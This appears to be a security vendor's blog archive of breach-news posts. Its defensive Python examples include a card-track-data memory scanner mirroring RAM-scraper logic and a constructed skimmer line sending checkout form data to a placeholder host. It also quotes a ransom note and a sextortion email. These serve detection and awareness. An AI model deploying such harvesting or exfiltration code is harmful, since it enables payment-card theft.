Ethical Hackers Converge on U.S. Army

Between October 9 and November 15, the U.S. Army was hacked by 52 different hackers. Without further context that sounds bad for the health of our nation’s armed services, but these particular hacks were part of the second “Hack the Army” event.

According to the Army’s press release, the bug bounty challenge put more than 60 publicly accessible web assets in scope. The purpose of the program was to “enhance the safety and security of these systems through crowdsourced security testing by an army of ethical hackers.”

It is our Duty

“It is our duty to ensure our citizens are protected from cyber threats, and finding new and innovative ways to do so is vital,” said Alex Romero, Digital Service Expert at Department of Defense Digital Service. “Our adversaries are determined and creative, so we must be every bit more of both. This latest HackerOne Challenge allows us to continue to harden the Army’s attack surfaces with the talent and diverse perspectives of HackerOne’s vetted hacker community.”

146 Vulnerabilities Found

The 5-week challenge drew hackers from the U.S., Canada, Germany, Portugal, Netherlands and Romania. In that short, intense time period 146 vulnerabilities were found and $275,000 in bounties paid.

Satisfying and Rewarding for All

On November 20, the challenge culminated in an awards ceremony in Augusta, Georgia, where the top three hackers, @alyssa_herrera, @erbbysam and @cdl, were rewarded for their contributions.

“The Department of Defense programs are some of my favorites to hack on, and Hack the Army 2.0 was one of the most rewarding,” said second place winner @alyssa_herrera. “It is so exciting to know that the vulnerabilities I find go towards strengthening Army defenses to protect millions of people. Coming in second place and being invited to spend time with the hackers and soldiers I worked alongside made the impact we made in this Challenge feel even bigger.”

Discover Your Vulnerabilities for FREE

You don’t have to be the Department of Defense and pay hundreds of thousands in bug bounties to take advantage of the power of ethical hacking and penetration testing.

Our team of experts is happy to provide an outside, independent and unbiased analysis of your network’s security. Simply give us a call or click here: https://konsultek.com/executive-risk-assessment/.

You’ll receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but demonstrate the likelihood of a breach happening.

So whether it is a wide open IP Address, ransomware, brute force hacking, phishing or some other cyber threat, Konsultek has the tools and talent to develop the right security solution for your particular situation.

A Billion Sensitive Medical Images are Available to Anyone on the Web

If you are like most people you’ve had at least one ridiculous run-in with the HIPAA laws. Most often it happens when you are trying to get medical results on behalf of another family member and you are denied because HIPAA is protecting his or her privacy!

And Yet ANYONE Can Download Their Images!

According to TechCrunch, over a billion medical images ranging from X-rays to ultrasounds and CT scans are available for download by anyone with an Internet connection and free-to-download software.

Makes one wonder where HIPAA is on this one.

Outdated and Insecure

The problem stems from insecure storage systems used by hospitals, medical imaging centers and medical offices. These archiving systems, known as PACS servers (Picture Archiving and Communication Systems), have had known weaknesses for quite some time. PACS servers speak DICOM (Digital Imaging and Communications in Medicine), the protocol that lets archived images be exchanged between servers and thus among the various healthcare providers who need them in order to provide patient care. DICOM’s network services run directly over TCP/IP, by default without encryption and with no access control beyond a configurable “Application Entity title” that any client can supply, so a PACS server whose DICOM port (commonly 104 or 11112) is reachable from the Internet can be found by anyone scanning for it and queried without ever entering a password.

The HIPAA website states:

“The HIPAA Privacy regulations require health care providers and organizations, as well as their business associates, to develop and follow procedures that ensure the confidentiality and security of protected health information (PHI) when it is transferred, received, handled, or shared.  This applies to all forms of PHI, including paper, oral, and electronic, etc.  Furthermore, only the minimum health information necessary to conduct business is to be used or shared.”

Open to Anyone Who Wants a Peek. Not Exactly HIPAA Compliant!

Since PACS servers store highly confidential data pertaining to the medical records of individuals, access should be heavily restricted per the HIPAA laws so that only certain personnel can view it. However, according to the results of a study conducted by Greenbone, “for many of the archiving systems nothing could be further from the truth. Anyone can access a significant number of these systems and, what’s more, they can see everything that’s stored on them.” And by everything, we mean everything. Greenbone found that these wide-open archives contained medical and personal information including Social Security Numbers, birth dates, procedure dates, exam details, treating physicians, clinics and the scans themselves. All searchable and in some cases downloadable.

Let Konsultek Check Your Network for Vulnerabilities

Whether it is a wide open IP Address, ransomware, brute force hacking, phishing or some other cyber threat, Konsultek has the tools and talent to develop the right security solution for your particular situation.  Not sure just how robust your network security is? No problem! Let our experts check your network’s vulnerability for free.

Our team of experts is happy to provide an outside, independent and unbiased analysis of your network’s security. Simply give us a call or click here: https://konsultek.com/executive-risk-assessment/.

You’ll receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but demonstrate the likelihood of a breach happening.

Gas Card POS Malware Plays Grinch Over Holiday Season

Visa has issued consecutive monthly security alerts regarding fuel dispenser merchant POS systems. In November Visa stated:

In August and September 2019, Visa Payment Fraud Disruption (PFD) investigated two separate breaches at North American fuel dispenser merchants. The attacks involved the use of point-of-sale (POS) malware to harvest payment card data from fuel dispenser merchant POS systems. It is important to note that this attack vector differs significantly from skimming at fuel pumps, as the targeting of POS systems requires the threat actors to access the merchant’s internal network.

In December, Visa followed up with a second security alert that stated:

These merchants are an increasingly attractive target for cybercrime groups. Track 1 and track 2 payment card data was at risk in the merchant’s POS environments due to the lack of secure acceptance technology (e.g. EMV® Chip, Point-to-Point Encryption, Tokenization, etc.) and non-compliance with PCI DSS.

This is Not Skimming

While most fuel pump card theft in years gone by has involved physical skimmers fitted to the pump, these latest threats take place at the network level.

Threat #1: In the first incident identified by Visa’s Payment Fraud Disruption (PFD) group, the attackers gained access to the merchant network through the old tried-and-true phishing email. A malicious link in that email installed a Remote Access Trojan (RAT) that provided network access. Once in, the attackers moved laterally through the network into the POS environment and ultimately installed a RAM scraper to harvest payment card data from the memory of the POS software.

Threat #2: In the second incident it is unclear how the attackers gained network access, but once in they followed a route similar to Threat #1, installed a RAM scraper and harvested payment card data. Forensic analysis of the compromise points to the cybercrime group FIN8 as the most likely culprit.

Threat #3: The third attack has also been attributed to FIN8 and used previously seen malware of the group’s own creation combined with a new, previously unseen shellcode backdoor.

More Technically Advanced

Visa’s PFD group concludes that a more sophisticated tier of cybercriminals has set its sights on fuel dispenser merchants. These criminals, while late to the fuel pump game, are happy to exploit the opportunity while it lasts. Visa’s EMV liability shift for fuel dispensers takes effect in October 2020, after which merchants without chip-capable readers on their pumps bear the cost of counterfeit fraud, so the window is expected to narrow. Note, though, that the chip alone does not keep card data out of POS memory: EMV makes the harvested data far less useful for producing counterfeit cards, while keeping cleartext track data away from a RAM scraper requires point-to-point encryption at the reader, which is why Visa lists EMV chip, P2PE and tokenization together.
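What a RAM scraper does is simple enough to show in a few dozen lines, which is also why the same pattern match makes a useful detection check over memory dumps from your own POS hosts. The following is an added example written for this post, not code from Visa’s alert or from any of the malware it describes: it scans a buffer for track 1 and track 2 data as it sits in cleartext in process memory, uses the Luhn check digit to discard false matches, and masks the PAN before reporting. The memory snapshot is constructed and the card numbers are public test numbers, not real accounts.

```python
import re

# Magnetic-stripe data as it sits, unencrypted, in a POS process's memory.
# Track 2: ;<PAN>=<YY><MM><service code><discretionary data>?
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{2})(\d{2})(\d{3})[0-9=]*\?")
# Track 1, format B: %B<PAN>^<SURNAME/FIRST>^<YY><MM><service code><discretionary data>?
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([A-Z /.'-]{2,26})\^(\d{2})(\d{2})(\d{3})[0-9A-Z ]*\?")


def luhn_ok(pan: bytes) -> bool:
    """Luhn check-digit validation, the same filter scrapers use to drop false matches."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = ch - 0x30                     # bytes iterate as ints; '0' is 0x30
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan: bytes) -> str:
    """Keep first six and last four digits only, so findings can be logged safely."""
    return (pan[:6] + b"*" * (len(pan) - 10) + pan[-4:]).decode("ascii")


def find_track_data(buf: bytes) -> list:
    """Return Luhn-valid track 1/2 hits in a memory buffer, ordered by offset."""
    hits = []
    for m in TRACK2_RE.finditer(buf):
        if luhn_ok(m.group(1)):
            hits.append({"track": 2, "offset": m.start(), "pan": mask_pan(m.group(1)),
                         "expiry": (m.group(2) + m.group(3)).decode("ascii"),
                         "service_code": m.group(4).decode("ascii")})
    for m in TRACK1_RE.finditer(buf):
        if luhn_ok(m.group(1)):
            hits.append({"track": 1, "offset": m.start(), "pan": mask_pan(m.group(1)),
                         "expiry": (m.group(3) + m.group(4)).decode("ascii"),
                         "service_code": m.group(5).decode("ascii")})
    return sorted(hits, key=lambda h: h["offset"])


# Constructed memory snapshot for the demo. The PANs are public test-card numbers.
SAMPLE_MEMORY = (
    b"\x00\x00POS-TXN-LOG\x00"
    b";4111111111111111=25121011234567890?"                  # track 2, Luhn-valid: reported
    b"\x00\x00noise;1234567890123456=2512101?"                # looks like track 2, fails Luhn: ignored
    b"%B5555555555554444^DOE/JANE^25121011000000000?\x00"    # track 1, Luhn-valid: reported
)


def scan_file(path: str) -> list:
    """Scan a saved process dump, e.g. one written by a memory acquisition tool on the POS host."""
    with open(path, "rb") as f:
        return find_track_data(f.read())


if __name__ == "__main__":
    for hit in find_track_data(SAMPLE_MEMORY):
        print(hit)
```

A hit in the memory of a POS process on a pump controller or back-office server is not by itself malware, but it tells you exactly what an attacker with that level of access would be able to read; on a P2PE-deployed lane the same scan should come back empty.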

Konsultek Knows Security

At Konsultek we create customized security solutions that utilize the most advanced prevention, detection and response technologies available. This holistic approach to security can help your organization stay ahead of cybercriminals and hackers who manage to penetrate your system defenses through social engineering means such as the phishing emails that compromised the fuel merchant described in Threat#1. Want to learn more? Give us a call and let’s discuss your specific situation and how we might be of service.

Milwaukee Nursing Home IT Outsourcer Crippled by Ransomware

Virtual Care Provider Inc. (VCPI), a Milwaukee-based company that provides technology services to more than 100 nursing homes across the country, has been hit by Russian hackers who are still holding the nursing homes’ data hostage.

A Terrible $14MM Miscalculation

As we have reported many times on this blog through the years, government and healthcare organizations are top targets for hackers, who believe that these organizations live in a “must pay” world. The problem with this particular attack is that VCPI was perceived by the Russian hackers as being much larger and financially stronger than it actually is. As it turns out, there is no way it can pay the $14MM ransom, even if it wanted to. That is a problem for the hackers and the nursing homes alike.

Do As I Say Not as I Do

In a display of irony that would make O. Henry proud, VCPI, which provides internet security and data storage services to nursing homes and acute-care facilities, has a blog post on its site offering guidance on how not to fall victim to email phishing attacks, the very type of attack that led to its own ransomware infection!

It’s Not Too Late Till It’s Too Late

According to information that security expert Alex Holden shared with KrebsOnSecurity.com, the attack played out over a period of 14 months, and right up until the final three days the catastrophe could have been avoided.

“While it is clear that the initial breach occurred 14 months ago, the escalation of the compromise didn’t start until around November 15th of this year,” Holden said. “When we looked at this in retrospect, during these three days the cybercriminals slowly compromised the entire network, disabling antivirus, running customized scripts, and deploying ransomware. They didn’t even succeed at first, but they kept trying.” –Alex Holden

Prevention, Detection and Response

At Konsultek we create customized security solutions that utilize the most advanced prevention, detection and response technologies available. This holistic approach to security can help your organization stay ahead of cybercriminals and hackers who manage to penetrate your system defenses through social engineering means such as the phishing emails that compromised VCPI. Want to learn more? Give us a call and let’s discuss your specific situation and how we might be of service.

 

Macy’s Stock Drops 10% When Second Data Breach Reported

It may well be the holiday season, a time for cheer and goodwill to all, but investors were not happy when on Tuesday, November 19, 2019, Macy’s reported that it had experienced another data breach in October.

Not Many Details Yet

Since the breach is so fresh there aren’t many details yet. Here is what Macy’s has reported so far:

Macys.com experienced a breach between October 7 and October 15 of this year.

  • Malicious code was inserted into its website
  • An unknown number of customers’ records were stolen
  • That customer information included:
    • Names
    • Addresses
    • Phone numbers
    • Credit card numbers
    • Credit card verification codes
    • Credit card expiration dates.

Magecart Again?

While the exact identity of the hacker is unknown at this point, some are already speculating that Magecart, the umbrella name for the web-skimming groups behind the British Airways, Ticketmaster UK, Newegg and Forbes hacks, might well be behind the Macy’s attack. Those attacks share the pattern Macy’s describes: code injected into the site’s own pages that copies payment details as the customer types them.
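Web skimmers of this kind run in the shopper’s browser, so a server-side malware scan does not see them; what does catch them is treating the set of scripts on your payment pages as a baseline and alerting on drift. The following is an added example for this post, not code from Macy’s or from any investigation of this breach: it extracts external script sources and inline script bodies from a page, flags sources outside an allowlist, and flags inline scripts whose SRI-style hash is not in the baseline. The checkout page, hostnames and injected skimmer in it are constructed for the demo.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._capturing = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._capturing = True
            self._buf = []

    def handle_data(self, data):
        if self._capturing:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._capturing:
            self.inline.append("".join(self._buf))
            self._capturing = False


def sri_hash(body: str) -> str:
    """sha384-<base64> over the exact script bytes, the form used by SRI and CSP hash sources."""
    return "sha384-" + base64.b64encode(hashlib.sha384(body.encode("utf-8")).digest()).decode("ascii")


def audit_page_scripts(html: str, allowed_hosts: set, known_inline_hashes: set) -> dict:
    """Flag script sources outside the allowlist and inline scripts whose hash is not in the baseline."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = {"unexpected_hosts": [], "unknown_inline": []}
    for src in collector.external:
        host = urlsplit(src).netloc.lower()
        if host and host not in allowed_hosts:       # a relative src is same-origin: not flagged
            findings["unexpected_hosts"].append(src)
    for body in collector.inline:
        digest = sri_hash(body)
        if digest not in known_inline_hashes:
            findings["unknown_inline"].append(digest)
    return findings


# Constructed checkout page for the demo: one legitimate inline script plus an injected
# third-party loader and an injected inline form-grabber. Hostnames are placeholders.
BASELINE_INLINE = "window.dataLayer = window.dataLayer || [];"
SAMPLE_CHECKOUT_HTML = (
    "<html><head>"
    '<script src="https://shop.example/js/checkout.js"></script>'
    "<script>" + BASELINE_INLINE + "</script>"
    '<script src="//static-collect.example/skim.js"></script>'
    "<script>document.addEventListener('submit',function(){"
    "new Image().src='https://static-collect.example/c?d='+btoa(document.forms[0].innerText)});</script>"
    '</head><body><form id="pay"></form></body></html>'
)

# Baseline captured from a known-good copy of the page (constructed here).
BASELINE = {"allowed_hosts": {"shop.example"}, "inline_hashes": {sri_hash(BASELINE_INLINE)}}


def demo() -> dict:
    return audit_page_scripts(SAMPLE_CHECKOUT_HTML, BASELINE["allowed_hosts"], BASELINE["inline_hashes"])


if __name__ == "__main__":
    print(demo())
```

Run the audit against the rendered checkout page on a schedule, from outside the CDN if one is in front of the site, and record the baseline from a copy you have reviewed by hand. The same hashes and hostnames can be turned into a Content-Security-Policy `script-src` directive, which moves the check from after-the-fact detection to enforcement in the browser.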

How Vulnerable is Your Network?

Whether your organization handles the data for 30 or 30 million people, Konsultek will help keep your network safe and your data secure.

If you are unclear as to whether or not your security is up to the challenges of today’s hackers, we can help you find out.

Our team of experts is happy to provide an outside, independent and unbiased analysis of your network’s security. Simply give us a call or click here: https://konsultek.com/executive-risk-assessment/.

You’ll receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but also demonstrate the likelihood of a breach occurring.

Laser Pointers Can Hack Virtual Assistants from Long Distances

Bored with taunting your cat with your laser pointer? Why not try taunting your neighbor instead by hijacking his virtual assistant?!

While we all know that virtual assistants such as Amazon’s Echo and Google’s Home, by their very design, respond to spoken commands, what researchers at the University of Michigan and the University of Electro-Communications, Tokyo, have discovered takes things to a whole new region of the electromagnetic spectrum!

Reach Out and Hack Someone

Using a laser pointer driven by an audio signal, the researchers demonstrated that they could issue commands to 13 different voice-activated devices at distances up to 110 meters. The trick works because the MEMS microphones in these devices respond to modulated light as though it were sound, so a command encoded in the beam’s intensity is transcribed as speech. The practical limits on the long-distance attack are the power of the beam, a line of sight to the microphone and, of course, your aim. Using a higher-powered laser the researchers elicited similar responses from phones and tablets.

Video (YouTube): https://www.youtube.com/embed/ORji7Tz5GiI

Impact of Vulnerability Depends on Assistant’s Use

If you are like many and use your smart assistant for nothing more than listening to the radio or asking about the weather, then the impact of a hack would be minimal. However, if you are a smart home aficionado, your home’s security, shopping accounts and possibly even your credit cards and connected medical devices could be at risk from this vulnerability. Moving beyond assistants, phones and tablets, the researchers were able to demonstrate similar light-based attacks involving certain Ford and Tesla automobiles.

IoT is Like the Wild West

Through the years we have documented vulnerabilities in all sorts of IoT devices from printers and refrigerators to automobiles and medical devices. The simple fact is device providers are far more interested in bringing new “wow” features to their products than they are building devices with robust security features.  That’s why you need a security partner like Konsultek. Our team of experts has the capabilities to identify vulnerabilities in your network and in the devices that connect to your network and then develop a customized security solution that keeps your organization safe from threats.

Medusa Ransomware Turns Your Files to Stone

Ok. The Medusa Ransomware doesn’t REALLY turn your files to stone, but it makes them just as useless and inaccessible. This latest ransomware burst on the scene in late September and, according to Bleeping Computer, it appears to be getting distributed worldwide, with victims scattered around the globe. Researchers have not yet identified how Medusa is being spread, though we can surmise it is through the usual channels such as phishing, malicious downloads and watering holes.

Just Getting Started

Only time will tell just how big and ugly Medusa will get but submissions to ID Ransomware have been streaming in.

Despite the steady stream of victims reporting in, Medusa is so new that very little is known about how it is being spread, or even whether you will receive a working decryption key if you pay the requested ransom!

According to the ransom note generated by Medusa you can email them one of your encrypted files and they will decrypt it for free to prove that they can indeed unlock your files before you send them payment. Speaking of payment, at this time it is not clear from the ransom note posted on Bleeping Computer (shown below) exactly how much you need to send! Perhaps these guys should get some third party help with their ransom demands?

All your data are encrypted!

What happened?

Your files are encrypted, and currently unavailable.

You can check it: all files on you computer has new expansion.

By the way, everything is possible to recover (restore), but you need to buy a unique decryptor.

Otherwise, you never cant return your data.

For purchasing a decryptor contact us by email:

sambolero@tutanoa.com

If you will get no answer within 24 hours contact us by our alternate emails:

rightcheck@cock.li

What guarantees?

Its just a business. If we do not do our work and liabilities – nobody will not cooperate with us.

To verify the possibility of the recovery of your files we can decrypted 1 file for free.

Attach 1 file to the letter (no more than 10Mb). Indicate your personal ID on the letter:

[id]

 

Attention!

– Attempts of change files by yourself will result in a loose of data.

– Our e-mail can be blocked over time. Write now, loss of contact with us will result in a loose of data.

– Use any third party software for restoring your data or antivirus solutions will result in a loose of data.

– Decryptors of other users are unique and will not fit your files and use of those will result in a loose of data.

– If you will not cooperate with our service – for us, its does not matter. But you will lose your time and data, cause just we have the private key.

Security Expertise You Can Count On

Whether it is ransomware, brute force hacking, phishing or some other cyber threat, Konsultek has the tools and talent to develop the right security solution for your particular situation.  Not sure just how robust your network security is? No problem! Let our experts check your network’s vulnerability for free.

Our team of experts is happy to provide an outside, independent and unbiased analysis of your network’s security. Simply give us a call or click here: https://konsultek.com/executive-risk-assessment/.

You’ll receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but demonstrate the likelihood of a breach happening.

Phorpiex Botnet Reinvents Itself as Sextortion Email Distributor

The Phorpiex (aka Trik) botnet has been active for nearly a decade and controls more than 500,000 infected hosts. According to research just released by Check Point, it has recently found a whole new way to generate income: running large-scale “sextortion” email campaigns.

Image Courtesy of Check Point Research

Evolve or Die

In the past, Phorpiex was monetized primarily by distributing other malware, including GandCrab, Pony and Pushdo, and by siphoning off its hosts’ computing power to mine cryptocurrency. Recently it evolved again, adding sextortion emails as its latest form of revenue generation.

Extortion Email on the Rise

In 2018 the FBI’s Internet Crime Complaint Center registered a 248% increase in extortion email activity. The majority of that email? Sextortion, of course! And why not? Once you have the assets in place, such as an underutilized botnet, a high-volume sextortion email campaign can generate a healthy passive income 24x7x365.

Leveraging a Cheap Commodity for a Novel Use

One of the more clever aspects of the sextortion scam is the use of real passwords to bolster the veracity of the email’s claims, thereby increasing the compliance rate of the victims.

Old credential dumps in which the passwords no longer work for the associated email addresses are very inexpensive on the black market, precisely because the pairs cannot be used to log in anywhere. But the password is still one the recipient recognizes, and when it is used to convince a sextortion victim that you really do have incriminating video or pictures of them, that flash of recognition is all the proof the scam needs, as the income numbers show.

Here is how this inexpensive data is used in the email:

From: Save Yourself
Subject: I recorded you – ██████

Hi, I know one of your passwords is: ██████

Your computer was infected with my private malware, your browser wasn’t updated / patched, in such case it’s enough to just visit some website where my iframe is placed to get automatically infected, if you want to find out more – Google: “Drive-by exploit”.
My malware gave me full access to all your accounts (see password above), full control over your computer and it also was possible to spy on you over your webcam.

The email goes on but it is that initial “proof” that is being bought in huge quantities for very little money that makes the campaign work so well.
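The scam works because the password is real, even if stale, so the first thing a help desk should establish is whether it came from a known breach dump. The following is an added example for this post, not code from Check Point’s report: it checks a password against the Have I Been Pwned “Pwned Passwords” range API using its k-anonymity model, in which only the first five characters of the password’s SHA-1 hash are sent and the matching suffix is searched locally, so the password itself never leaves your machine. The offline stand-in for the range response and its counts are constructed; `live_fetch_range` is the real network call, and the triage labels are this example’s own.

```python
import hashlib
import urllib.request

HIBP_RANGE_URL = "https://api.pwnedpasswords.com/range/"


def pwned_count(password: str, fetch_range) -> int:
    """k-anonymity range query: only the first five hex characters of the SHA-1 are sent.
    fetch_range(prefix) must return the service's text body, one '<35-hex-suffix>:<count>' per line."""
    sha1 = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = sha1[:5], sha1[5:]
    for line in fetch_range(prefix).splitlines():
        candidate, _, count = line.strip().partition(":")
        if candidate.strip() == suffix:
            return int(count.strip() or 0)
    return 0


def live_fetch_range(prefix: str) -> str:
    """Real fetcher for the Pwned Passwords range endpoint (network access required)."""
    req = urllib.request.Request(HIBP_RANGE_URL + prefix,
                                 headers={"User-Agent": "sextortion-triage-example"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def triage_sextortion_password(claimed_password: str, fetch_range=live_fetch_range) -> str:
    """Decide whether the password quoted in a sextortion email is evidence of anything."""
    n = pwned_count(claimed_password, fetch_range)
    if n > 0:
        return "old-breach-credential"   # sender bought a dump; no sign this machine was touched
    return "not-in-breach-corpus"        # unusual: find out where the sender got it


# Constructed, offline stand-in for the range endpoint. The prefix 5BAA6 is the real
# SHA-1 prefix of the string "password"; the counts are made up for the demo.
CONSTRUCTED_RANGE_5BAA6 = (
    "1D2DA4053E34E76F6576ED1DA63134B5E2A:2\r\n"
    "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493\r\n"
    "1F2B668E8AABEF1C59E9EC6F82E3F3CD786:1\r\n"
)


def constructed_fetch_range(prefix: str) -> str:
    return CONSTRUCTED_RANGE_5BAA6 if prefix == "5BAA6" else ""


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple"):
        print(pw, "->", triage_sextortion_password(pw, constructed_fetch_range))
```

Whatever the verdict, the password quoted in the email should be retired everywhere it is still in use; the “old-breach-credential” answer only tells you the sender did not need access to the recipient’s computer to obtain it.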

$22,000 a Month from 30,000 Emails an Hour

Check Point researchers monitored the Phorpiex campaign for five months, and during that time the campaign’s wallets took in more than 14 Bitcoins, equating to a respectable $22,000 per month. Not bad for an auto-pilot business that leverages 500,000 zombie computers to send out up to 30,000 emails an hour.

Extortion, Malware, Phishing we’ve Seen it All

At Konsultek we specialize in giving our customers peace of mind through customized security solutions that utilize the most advanced prevention, detection and response technologies available.

Have manpower or talent issues? Our managed security suite allows organizations to gain access to superb security engineers as needed without the expense and hassle of recruiting and hiring staff. Call us today to learn about how your organization’s future can become more secure.

Yahoo Announces Class Action Settlement for Data Breach

Following on the heels of the Equifax settlement in July 2019, Yahoo has announced that it will settle the class action litigation brought against it over its series of massive data breaches.

In case you can’t quite remember all that went wrong with Yahoo in regards to breaches, here is a quick recap from their press release:

  1. 2012 Data Security Intrusions: From at least January through April 2012, at least two different malicious actors accessed Yahoo’s internal systems. The available evidence, however, does not reveal that user credentials, email accounts, or the contents of emails were taken out of Yahoo’s systems.
  2. 2013 Data Breach: In August 2013, malicious actors were able to gain access to Yahoo’s user database and took records for all existing Yahoo accounts—approximately three billion accounts worldwide. The records taken included the names, email addresses, telephone numbers, birth dates, passwords, and security questions and answers of Yahoo account holders. As a result, the actors may have also gained access to the contents of breached Yahoo accounts and, thus, any private information contained within users’ emails, calendars, and contacts.
  3. 2014 Data Breach: In November 2014, malicious actors were able to gain access to Yahoo’s user database and take records of approximately 500 million user accounts worldwide. The records taken included the names, email addresses, telephone numbers, birth dates, passwords, and security questions and answers of Yahoo account holders, and, as a result, the actors may have also gained access to the contents of breached Yahoo accounts, and thus, any private information contained within users’ emails, calendars, and contacts.
  4. 2015 and 2016 Data Breach: From 2015 to September 2016, malicious actors were able to use cookies instead of a password to gain access into approximately 32 million Yahoo email accounts.

Do You Qualify for Compensation?

If you received a notice from Yahoo about the data breaches, or if you had a Yahoo account at any time between January 1, 2012 and December 31, 2016, and are a resident of the United States or Israel, you are a “Settlement Class Member.”

Under the terms of the Settlement, Yahoo has created a Settlement Fund of $117,500,000 and will provide victims a minimum of two years of Credit Monitoring Services to protect Settlement Class Members from future harm, or an alternative cash payment for those who verify they already have credit monitoring or identity protection.

If you can prove that you have had out-of-pocket losses, including but not limited to loss of time dealing with the breach, you may qualify for additional compensation.

The complete list of all available legal rights and options can be found here.

Prevention is the Better Option

At Konsultek we firmly believe that an ounce of prevention is worth a pound of cure. The negative impact a breach can have on your brand is far greater than any fine or lawsuit that could potentially be levied against you. That is why we specialize in developing custom security solutions that utilize the most advanced prevention, detection and response technologies available.

Have manpower or talent issues? Our managed security suite allows organizations to gain access to superb security engineers as needed without the expense and hassle of recruiting and hiring staff. Call us today to learn about how your organization’s future can become more secure.

Entire Population of Ecuador’s Data Leaked

While in sheer numbers the Ecuadorian leak is far smaller than many corporate breaches in the US, the Ecuadorian government is taking the breach far more seriously than the US government ever has, or probably ever will, and is meting out justice swiftly and decisively.

According to a post on vpnmentor.com more than 20 million people, including 7 million minors, had their most sensitive data leaked including the Ecuadorian equivalent of social security numbers, tax payer ID numbers and a host of other information including:

  • full name (first, middle, last)
  • gender
  • date of birth
  • place of birth
  • home address
  • email address
  • home, work, and cell phone numbers
  • marital status
  • date of marriage (if applicable)
  • date of death (if applicable)
  • level of education.

Image Source: CNN.com

A Significant Breach Deserves Significant Consequences

At least that is how the Ecuadorian government feels. According to an article on CNN, Ecuadorians take their breaches a little more seriously than we do here in the States.

“On Monday, prosecutors and a federal police force raided the home of Novaestrat’s legal representative, William Roberto G., seizing electronic equipment and computers. Later that evening, the police found and detained him in Ecuador’s northwestern Esmeraldas province.

“He will be transferred immediately so that the Ecuador prosecutor can gather information in the framework of the investigation that is taking place,” tweeted Interior Minister Maria Paula Romo.

“If it’s confirmed that they violated the personal privacy of Ecuadorians, it is a criminal offense that must be punished,” said Telecommunications Minister Andres Michelena on Twitter.”

Imagine if the CEOs of Target, Home Depot and Equifax were dragged out of their homes in response to their breaches! That might get the always-challenged CISO budget enhanced and approved!

Konsultek Takes Security Seriously Too

Whether your organization handles the data for 30 or 30 million people, Konsultek will help keep your network safe and your data secure.

If you are unclear as to whether or not your security is up to the challenges of today’s hackers, we can help you find out.

Our team of experts is happy to provide an outside, independent and unbiased analysis of your network’s security. Simply give us a call or click here: https://konsultek.com/executive-risk-assessment/.

You’ll receive a complimentary Executive Risk Assessment. This assessment will not only show you the risk and impact to your most critical digital assets but also demonstrate the likelihood of a breach occurring.

© Copyright 2018 Konsultek